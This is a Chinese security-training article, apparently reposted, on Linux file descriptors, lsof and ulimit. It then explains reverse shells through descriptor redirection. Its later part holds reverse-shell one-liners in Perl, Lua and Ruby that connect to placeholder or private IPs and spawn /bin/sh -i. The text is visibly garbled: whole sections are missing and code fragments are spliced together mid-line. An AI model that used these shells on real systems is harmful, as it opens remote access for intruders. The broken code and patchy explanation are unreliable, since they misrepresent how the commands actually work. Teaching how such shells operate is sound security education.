当前位置:网站首页 > 黑客培训 > 正文

原创 4ct10n 合天智汇

freebuffreebuf 2020-02-25 313 0

本文来源:原创 4ct10n 合天智汇

原创 4ct10n 合天智汇

0x01 文件描述符介绍

Linux 系统中,把一切都看做是文件,当进程打开现有文件或创建新文件时,内核向进程返回一个文件描述符,文件描述符就是内核为了高效管理已被打开的文件所创建的索引,用来指向被打开的文件,所有执行I/O操作的系统调用都会通过文件描述符。这个操作包含各种文件的读写,程序的输入输出等。

0x1 文件与文件描述符

文件描述符最终对应的是文件,文件包含多种类型文件又可分为:普通文件、目录文件、链接文件和设备文件。程序刚刚启动的时候,0是标准输入,1是标准输出,2是标准错误。如果此时去打开一个新的文件,它的文件描述符会是3。POSIX标准要求每次打开文件时(含socket)必须使用当前进程中最小可用的文件描述符号码.

0x2 相互关系

其中进程,文件,文件描述符的关系如下:一个进程可以有多个文件描述符一个文件可以由多个文件描述符对应,文件描述符可以是不同进程一个文件描述符只能对应一个文件

具体关系图如下

v2-26e07f59de61dcd99d567a60168bc4cb_b.jp

文件描述符映射到文件

第一列是用户态进程符号描述表,后两列是内核态系统级表项。具体从文件描述符到文件,先从文件描述符表开始索引,定位到文件句柄指针,接着找到打开文件表,存储着文件的状态,包括偏移,inode号等,不同的文件描述符可以指向相同的文件句柄指针(可用dup或dup2函数实现)。

0x3 操作指令

lsof

lsof是列出系统所占用的资源(list open files),其中包括句柄资源。

lsof -a -p pid -d0,1,2,3#查看进程的文件描述符 lsof -w -n #查看所有使用的文件

ulimit

ulimit主要是用来限制进程对资源的使用情况的,它支持各种类型的限制,包括打开文件句柄数限制。

ulimit -n #查看进程允许打开的最大文件句柄数 ulimit -n pid#设置进程能打开的最大文件句柄数

看完了内容,做个实验放松一下:Web操作系统基础-Linux

open(STDERR,">exec("/bin/sh -i");};'

v2-f59bfe44bfce706d0a32e18b20021196_b.jp

perl代码 子程序 文件描述符

在perl代码中,重定向函数为open,open(STDOUT, ">file1")翻译为将替换STDOUT指向的文件为file1;open(STDIN,">require('os');t=socket.tcp();t:connect('x.x.x.x','5555');os.execute('/bin/sh -i "

v2-1e1e7f32e10e876dda00e10fc84349d5_b.jp

lua 代码文件描述符

和php类似的现象,文件描述符编号递增,接着把bash输入输出重定向到socket

0x6 ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i c=TCPSocket.new("192.168.0.115","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

v2-7ca1a35d64576dec21fe6d2296f18f9e_b.jp

ruby代码文件描述符

脱离了系统自带的bash,将socket和程序cmd IO绑定起来,利用|实现重定向。

0x04 总结

从基础shell的文件描述符到程序中的文件描述符。可以总结几个比较重要的点

  1. 文件描述符在用户态,同时在系统中会对应一个文件
  2. 文件描述符对应的文件可以有多种类型,pipe,文件,终端等
  3. 0,1,2是程序默认的输入,输出,错误输出,新的文件描述符号会递增
  4. 子进程会继承所有父进程的文件描述符状态
  5. 文件描述符有很多赋值操作例如exec ,>

声明:笔者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关!


转载请注明来自网盾网络安全培训,本文标题:《原创 4ct10n 合天智汇》

标签:合天智汇

关于我

欢迎关注微信公众号

关于我们

网络安全培训,黑客培训,渗透培训,ctf,攻防

标签列表